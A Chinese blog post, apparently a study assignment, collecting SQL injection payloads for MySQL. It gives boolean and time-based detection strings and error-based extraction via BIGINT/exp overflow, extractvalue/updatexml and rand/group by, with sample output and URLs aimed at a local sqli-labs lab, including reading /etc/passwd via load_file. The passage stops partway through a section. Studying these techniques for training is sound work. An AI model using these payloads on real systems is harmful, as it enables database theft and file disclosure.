<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="baidu-site-verification" content="qjesL1ElWb">
    <meta name="keywords" content="第六周：数据库相关注入语句的收集和学习, the-wind-hunter">
    <meta name="baidu-site-verification" content>
    <meta name="google-site-verification" content>
    <meta name="360-site-verification" content>
    <meta name="description" content="第六周：数据库相关注入语句的收集和学习
日期：2019-09-09
作者：无风
简介：数据库相关注入语句的收集和学习

0x01 任务要求1、收集网络上各种 sql 注入时使用的 payload 并理解其适用的环境（检测注入、利用注入）
2">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>第六周：数据库相关注入语句的收集和学习 | the-wind-hunter</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">
    <style type="text/css">
        
    </style>

    <script src="/libs/jquery/jquery-2.2.0.min.js"></script>
    <script src="https://sdk.jinrishici.com/v2/browser/jinrishici.js" charset="utf-8"></script>
    <script>
        var _hmt = _hmt || [];
        (function () {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?46e79e71af0709a5b9106bf20cecc493";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
    </script>
</head>

<body>

    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">the-wind-hunter</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fa fa-navicon"></i></a>
<ul class="right">
    
    <li class="hide-on-med-and-down">
        <a href="/" class="waves-effect waves-light">
            
            <span>首页</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/tags" class="waves-effect waves-light">
            
            <span>标签</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/categories" class="waves-effect waves-light">
            
            <span>分类</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/archives" class="waves-effect waves-light">
            
            <span>归档</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/about" class="waves-effect waves-light">
            
            <span>关于</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/friends" class="waves-effect waves-light">
            
            <span>友情链接</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/contact" class="waves-effect waves-light">
            
            <span>留言板</span>
        </a>
    </li>
    
    <li>
        <a href="#searchModal" class="modal-trigger waves-effect waves-light">
            <i id="searchIcon" class="fa fa-search" title="搜索"></i>
        </a>
    </li>
</ul>

<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">the-wind-hunter</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li>
            <a href="/" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                首页
            </a>
        </li>
        
        <li>
            <a href="/tags" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                标签
            </a>
        </li>
        
        <li>
            <a href="/categories" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                分类
            </a>
        </li>
        
        <li>
            <a href="/archives" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                归档
            </a>
        </li>
        
        <li>
            <a href="/about" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                关于
            </a>
        </li>
        
        <li>
            <a href="/friends" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                友情链接
            </a>
        </li>
        
        <li>
            <a href="/contact" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-link"></i>
                
                留言板
            </a>
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/godweiyang" class="waves-effect waves-light" target="_blank">
                <i class="fa fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>

        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/godweiyang" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/12.jpg')">
    <div class="container">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <div class="description center-align post-title">
                        第六周：数据库相关注入语句的收集和学习
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 20px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        <span class="chip bg-color">无标签</span>
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                <div class="post-date info-break-policy">
                    <i class="fa fa-calendar-minus-o fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2019-09-19
                </div>

                <div class="post-author info-break-policy">
                    <i class="fa fa-user-o fa-fw"></i>作者:&nbsp;&nbsp;
                    
                    jax
                    
                </div>

                
                
                <div class="info-break-policy">
                    <i class="fa fa-file-word-o fa-fw"></i>文章字数:&nbsp;&nbsp;
                    6.3k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="fa fa-clock-o fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    30 分
                </div>
                
                

                
                <div id="busuanzi_container_page_pv" class="info-break-policy">
                    <i class="fa fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                    <span id="busuanzi_value_page_pv"></span>
                </div>
                
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="第六周：数据库相关注入语句的收集和学习"><a href="#第六周：数据库相关注入语句的收集和学习" class="headerlink" title="第六周：数据库相关注入语句的收集和学习"></a>第六周：数据库相关注入语句的收集和学习</h1><blockquote>
<p>日期：2019-09-09</p>
<p>作者：无风</p>
<p>简介：数据库相关注入语句的收集和学习</p>
</blockquote>
<h2 id="0x01-任务要求"><a href="#0x01-任务要求" class="headerlink" title="0x01 任务要求"></a>0x01 任务要求</h2><p>1、收集网络上各种 sql 注入时使用的 payload 并理解其适用的环境（检测注入、利用注入）</p>
<p>2、记录 sqlmap 的检测和利用过程中使用的 payload（也算一种 payload 收集方式）</p>
<p>3、理解以上涉及的 sql 语句的意思，其中会涉及不同的数据库、不同注入场景，可以将学习的过程和收集的方式进行整理形成报告，关于 payload 的理解，其中会涉及之前学习的基础。</p>
<p><strong>扩展学习：</strong>理解 sqlmap 自带 tamper 的原理，这里通常包含很多数据库的特性，从而实现 payload 变形啥的，用来绕过一些简单的安全检测</p>
<h2 id="0x02-检测注入类型payload"><a href="#0x02-检测注入类型payload" class="headerlink" title="0x02 检测注入类型payload"></a>0x02 检测注入类型payload</h2><h3 id="2-1-BOOL-SQLINJECTION"><a href="#2-1-BOOL-SQLINJECTION" class="headerlink" title="2.1 BOOL SQLINJECTION"></a>2.1 BOOL SQLINJECTION</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">\</span><br><span class="line">&apos;</span><br><span class="line">&quot;</span><br><span class="line">%df&apos;</span><br><span class="line">%df&quot;</span><br><span class="line">and 1=1</span><br><span class="line">and 1=2</span><br><span class="line">&apos; and &apos;1&apos;=&apos;1</span><br><span class="line">&apos; and &apos;1&apos;=&apos;2</span><br><span class="line">&quot; and &quot;1&quot;=&quot;1</span><br><span class="line">&quot; and &quot;1&quot;=&quot;2</span><br><span class="line">) and (1=1</span><br><span class="line">) and (1=2</span><br><span class="line">&apos;) and (&apos;1&apos;=&apos;1</span><br><span class="line">&apos;) and (&apos;1&apos;=&apos;2</span><br><span class="line">%&apos; and 1=1 and &apos;%&apos;=&apos;</span><br><span class="line">%&apos; and 1=2 and &apos;%&apos;=&apos;x</span><br><span class="line">%&apos;) and 1=1 and (&apos;%&apos;=&apos;</span><br><span class="line">%&apos;) and 1=2 and (&apos;%&apos;=&apos;x</span><br><span class="line">OR 1=1</span><br><span class="line">OR 1=2</span><br><span class="line">&apos; OR 1=1-- -</span><br><span class="line">&apos; OR 1=2-- -</span><br><span class="line">) OR 1=1-- -</span><br><span class="line">) OR 1=2-- -</span><br><span class="line">&apos;) OR 1=1-- -</span><br><span class="line">&apos;) OR 1=2-- -</span><br><span class="line">&quot; OR &quot;1&quot;=&quot;1</span><br><span class="line">&quot; OR &quot;1&quot;=&quot;2</span><br><span class="line">&apos; OR &apos;1&apos;=&apos;1</span><br><span class="line">&apos; OR &apos;1&apos;=&apos;2</span><br><span class="line">) OR (1=1</span><br><span class="line">) OR (1=2</span><br><span class="line">&apos;) OR (&apos;1&apos;=&apos;1</span><br><span class="line">&apos;) OR (&apos;1&apos;=&apos;2</span><br></pre></td></tr></table></figure>

<h3 id="2-2-TIME-BASE-SQLINJECTION"><a href="#2-2-TIME-BASE-SQLINJECTION" class="headerlink" title="2.2 TIME-BASE SQLINJECTION"></a><strong>2.2 TIME-BASE SQLINJECTION</strong></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> &apos; and if(1=0,1, sleep(10)) --+    </span><br><span class="line"></span><br><span class="line">&quot; and if(1=0,1, sleep(10)) --+</span><br><span class="line"></span><br><span class="line">) and if(1=0,1, sleep(10)) --+</span><br><span class="line"></span><br><span class="line">&apos;) and if(1=0,1, sleep(10)) --+</span><br><span class="line"></span><br><span class="line">&quot;) and if(1=0,1, sleep(10)) --+</span><br></pre></td></tr></table></figure>

<h2 id="0x03-报错型注入"><a href="#0x03-报错型注入" class="headerlink" title="0x03 报错型注入"></a>0x03 报错型注入</h2><p><strong>SQL报错注入就是利用数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。这种手段在联合查询受限且能返回错误信息的情况下比较好用，毕竟用盲注的话既耗时又容易被封。</strong></p>
<h3 id="MYSQL报错注入大体可以分为以下几类"><a href="#MYSQL报错注入大体可以分为以下几类" class="headerlink" title="MYSQL报错注入大体可以分为以下几类"></a>MYSQL报错注入大体可以分为以下几类</h3><ul>
<li><strong>BIGINT等数据类型溢出</strong></li>
<li><strong>Xpath语法错误</strong></li>
<li><strong>concat+rand()+group_by()导致主键重复</strong></li>
<li><strong>数据库的一些特性</strong></li>
</ul>
<hr>
<h3 id="3-1-BIGINT等数据类型溢出"><a href="#3-1-BIGINT等数据类型溢出" class="headerlink" title="3.1 BIGINT等数据类型溢出"></a>3.1 BIGINT等数据类型溢出</h3><blockquote>
<p>在mysql5.5之前，整形溢出是不会报错的，根据官方文档说明out-of-range-and-overflow，只有版本号大于5.5.5时，才会报错。试着对最大数做加法运算，可以看到报错的具体情况，在mysql中，要使用这么大的数，并不需要输入这么长的数字进去，使用按位取反运算运算即可：</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select 18446744073709551615+1;</span><br><span class="line">ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in &apos;(18446744073709551615 + 1)&apos;</span><br><span class="line">mysql&gt; select ~0+1;</span><br><span class="line">ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in &apos;(~(0) + 1)&apos;</span><br></pre></td></tr></table></figure>

<p><strong>我们知道，如果一个查询成功返回，则其返回值为0，进行逻辑非运算后可得1，这个值是可以进行数学运算的：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select (select * from (select user())x);</span><br><span class="line">     &gt; root@localhost</span><br><span class="line">mysql&gt; select !(select * from (select user())x);</span><br><span class="line">     &gt; 1</span><br><span class="line">mysql&gt; select ~(select * from (select user())x);</span><br><span class="line">     &gt; 18446744073709551615</span><br></pre></td></tr></table></figure>

<p> <strong>同理，利用exp函数也会产生类似的溢出错误：</strong>       </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select exp(~(select*from(select user())x));</span><br><span class="line">ERROR 1690 (22003): DOUBLE value is out of range in &apos;exp(~((select &apos;root@localhost&apos; from dual)))&apos;</span><br><span class="line">mysql&gt; select (select(!x-~0)from(select(select user())x)a);</span><br><span class="line">ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in &apos;((not(&apos;root@localhost&apos;)) - ~(0))&apos;</span><br><span class="line">mysql&gt; select (!(select * from (select user())x) - ~0);</span><br><span class="line">ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in &apos;((not((select &apos;root@localhost&apos; from dual))) - ~(0))&apos;</span><br><span class="line">mysql&gt; select exp(~(select*from (select table_name from information_schema.tables limit 0,1)x));</span><br><span class="line">ERROR 1690 (22003): DOUBLE value is out of range in &apos;exp(~((select &apos;CHARACTER_SETS&apos; from dual)))&apos;</span><br><span class="line">mysql&gt; select exp(~(select*from (select concat(table_schema,&apos;:&apos;,table_name) from information_schema.tables limit 0,1)x));</span><br><span class="line">ERROR 1690 (22003): DOUBLE value is out of range in &apos;exp(~((select &apos;information_schema:CHARACTER_SETS&apos; from dual)))&apos;</span><br><span class="line">mysql&gt; select exp(~(select*from(select load_file(&apos;/etc/passwd&apos;))a));</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br></pre></td></tr></table></figure>

<p>报错信息是有长度限制的，同时报错的信息跟MySQL版本、MySQL所在操作系统有关系。</p>
<p><strong>几种形式的变种：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select !(select*from(select user())x)-~0;</span><br><span class="line">mysql&gt; select (select(!x-~0)from(select(select user())x)a);</span><br><span class="line">mysql&gt; select (select!x-~0.from(select(select user())x)a);</span><br></pre></td></tr></table></figure>

<p><strong>利用这种基于BIGINT溢出错误的注入手法，我们可以几乎可以使用MySQL中所有的数学函数，如：ATAN、CEIL、FLOOR、HEX、RAND、IN、CEILING、TRUNCATE、TAN、SQRT、ROUND‘SIGN等函数：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select !atan((select*from(select user())a))-~0; </span><br><span class="line">mysql&gt; select !ceil((select*from(select user())a))-~0;</span><br><span class="line">mysql&gt; select !floor((select*from(select user())a))-~0;</span><br></pre></td></tr></table></figure>

<p><strong>注入案例：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1&apos; union select (exp(~(select * FROM(SELECT USER())a))),2,3-- </span><br><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1&apos; union select (!(select * from (select user())x) - ~0),2,3-- </span><br><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1&apos; union select exp(~(select*from (select concat(table_schema,&apos;:&apos;,table_name) from information_schema.tables limit 0,1)x)),2,3-- </span><br><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1&apos; and (exp(~(select * FROM(SELECT USER())a)))-- </span><br><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1&apos; and exp(~(select*from (select concat(table_schema,&apos;:&apos;,table_name) from information_schema.tables limit 0,1)x))--</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="3-1-2-Xpath语法错误"><a href="#3-1-2-Xpath语法错误" class="headerlink" title="3.1.2 Xpath语法错误"></a>3.1.2 Xpath语法错误</h3><blockquote>
<p>从mysql5.1.5开始提供两个XML查询和修改的函数，extractvalue和updatexml。extractvalue负责在xml文档中按照xpath语法查询节点内容，updatexml则负责修改查询到的内容：</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select extractvalue(1,&apos;/a/b&apos;);</span><br><span class="line">mysql&gt; select updatexml(1,&apos;/a/b&apos;,1);</span><br></pre></td></tr></table></figure>

<p><strong>它们的第二个参数都要求是符合xpath语法的字符串，如果不满足要求，则会报错，并且将查询结果放在报错信息里:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select extractvalue(1,concat(0x7e,(select @@version),0x7e));</span><br><span class="line">ERROR 1105 (HY000): XPATH syntax error: &apos;~5.5.36-log~&apos;</span><br><span class="line">mysql&gt; select extractvalue(1,concat(0x7e,(select user()),0x7e));</span><br><span class="line">ERROR 1105 (HY000): XPATH syntax error: &apos;~root@localhost~&apos;</span><br><span class="line">mysql&gt; select updatexml(1,concat(0x7e,(select database()),0x7e),1);</span><br><span class="line">ERROR 1105 (HY000): XPATH syntax error: &apos;~security~&apos;</span><br><span class="line">mysql&gt; select updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 0,1),0x7e),1);</span><br><span class="line">ERROR 1105 (HY000): XPATH syntax error: &apos;~CHARACTER_SETS~&apos;</span><br><span class="line">mysql&gt; select updatexml(1,concat(0x7e,(select concat(table_schema, &apos;:&apos;,table_name) from information_schema.tables limit 0,1),0x7e),1);</span><br><span class="line">ERROR 1105 (HY000): XPATH syntax error: &apos;~information_schema:CHARACTER_SE&apos;</span><br><span class="line">mysql&gt; select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&apos;security&apos;),0x7e),1);</span><br><span class="line">ERROR 1105 (HY000): XPATH syntax error: &apos;~emails,referers,uagents,users~&apos;</span><br></pre></td></tr></table></figure>

<p><strong>注入案例：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; and extractvalue(1,concat(0x7e,(select database()),0x7e))-- </span><br><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; and extractvalue(1,concat(0x7e,(select concat(table_schema, &apos;:&apos;, table_name) from information_schema.tables limit 0,1),0x7e))-- </span><br><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&apos;security&apos;),0x7e))-- </span><br><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; union select extractvalue(1,concat(0x7e,(select database()),0x7e)),2,3-- </span><br><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; union select extractvalue(1,concat(0x7e,(select concat(table_schema, &apos;:&apos;, table_name) from information_schema.tables limit 0,1),0x7e)) ,2, 3 -- </span><br><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&apos;security&apos;),0x7e)),2,3--</span><br></pre></td></tr></table></figure>

<p><strong>注意：extractvalue()和updatexml()报错信息是有长度限制的，最大长度限制32位</strong></p>
<h3 id="3-1-3-concat-rand-group-by-导致主键重复"><a href="#3-1-3-concat-rand-group-by-导致主键重复" class="headerlink" title="3.1.3 concat+rand()+group_by()导致主键重复"></a>3.1.3 concat+rand()+group_by()导致主键重复</h3><blockquote>
<p>这里利用到了count()和group by在遇到rand()产生的重复值时报错，错误类型是duplicate entry，即主键重复。实际上只要是count，rand()，group by三个连用就会造成这种报错，与位置无关</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select count(*) from users group by floor(rand(0)*2);</span><br><span class="line">ERROR 1062 (23000): Duplicate entry &apos;1&apos; for key &apos;group_key&apos;</span><br></pre></td></tr></table></figure>

<p><strong>这种报错方法的本质是因为floor(rand(0)*2)的重复性，导致group by语句出错。group by key的原理是循环读取数据的每一行，将结果保存于临时表中。读取每一行的key时，如果key存在于临时表中，则不在临时表中更新临时表的数据；如果key不在临时表中，则在临时表中插入key所在行的数据。</strong></p>
<blockquote>
<p>MySQL官方：查询的时候如果使用rand()的话，该值会被计算多次，在使用group by的时候，floor(rand(0)*2)会被执行一次，如果虚表不存在记录，插入虚表的时候会再被执行一次，最终会导致主键重复错误产生。</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select count(*) from users group by concat(version(),floor(rand(0)*2));</span><br><span class="line">ERROR 1062 (23000): Duplicate entry &apos;5.5.36-log1&apos; for key &apos;group_key&apos;</span><br><span class="line">mysql&gt; select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;</span><br><span class="line">ERROR 1062 (23000): Duplicate entry &apos;5.5.36-log1&apos; for key &apos;group_key&apos;</span><br><span class="line">mysql&gt; select count(*) from users group by concat((select table_name from information_schema.tables limit 0,1),&apos;:&apos;,floor(rand(0)*2));</span><br><span class="line">ERROR 1062 (23000): Duplicate entry &apos;CHARACTER_SETS:1&apos; for key &apos;group_key&apos;</span><br><span class="line">mysql&gt; select count(*),concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x; </span><br><span class="line">ERROR 1062 (23000): Duplicate entry &apos;CHARACTER_SETS1&apos; for key &apos;group_key&apos;</span><br><span class="line">mysql&gt; select count(*) from information_schema.tables group by concat((select concat(table_schema,&apos;:&apos;,table_name) from information_schema.tables limit 0,1),floor(rand(0)*2));</span><br><span class="line">ERROR 1062 (23000): Duplicate entry &apos;information_schema:CHARACTER_SETS1&apos; for key &apos;group_key&apos;</span><br></pre></td></tr></table></figure>

<p><strong>注入实例：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; union select count(*),2,3 from users group by concat(database(),floor(rand(0)*2))-- </span><br><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; union select count(*),2,3 from information_schema.tables group by concat((select concat(table_schema,&apos;:&apos;,table_name) from information_schema.tables limit 0,1),floor(rand(0)*2))--</span><br></pre></td></tr></table></figure>

<h3 id="3-1-4-数据库的一些特性"><a href="#3-1-4-数据库的一些特性" class="headerlink" title="3.1.4 数据库的一些特性"></a>3.1.4 数据库的一些特性</h3><blockquote>
<p>利用数据库的一些特性产生报错信息。</p>
</blockquote>
<p><strong>列名重复</strong></p>
<p>mysql列名重复会报错，我们利用name_const来制造一个列，根据官方文档，name_const函数要求参数必须是常量，所以实际使用上还没找到什么比较好的利用方式。</p>
